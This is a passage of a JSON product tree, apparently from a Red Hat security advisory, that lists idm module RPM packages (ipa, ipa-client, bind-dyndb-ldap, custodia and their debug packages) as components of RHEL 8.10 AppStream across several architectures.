"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1"
},
"product_reference": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1"
},
"product_reference": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1"
},
"product_reference": "ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client"
},
"product_reference": "ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client"
},
"product_reference": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client"
},
"product_reference": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client"
},
"product_reference": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client"
},
"product_reference": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client"
},
"product_reference": "ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client"
},
"product_reference": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client"
},
"product_reference": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client"
},
"product_reference": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client"
},
"product_reference": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client"
},
"product_reference": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client"
},
"product_reference": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client"
},
"product_reference": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client"
},
"product_reference": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client"
},
"product_reference": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client"
},
"product_reference": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client"
},
"product_reference": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client"
},
"product_reference": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client"
},
"product_reference": "ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client"
},
"product_reference": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client"
},
"product_reference": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client"
},
"product_reference": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client"
},
"product_reference": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
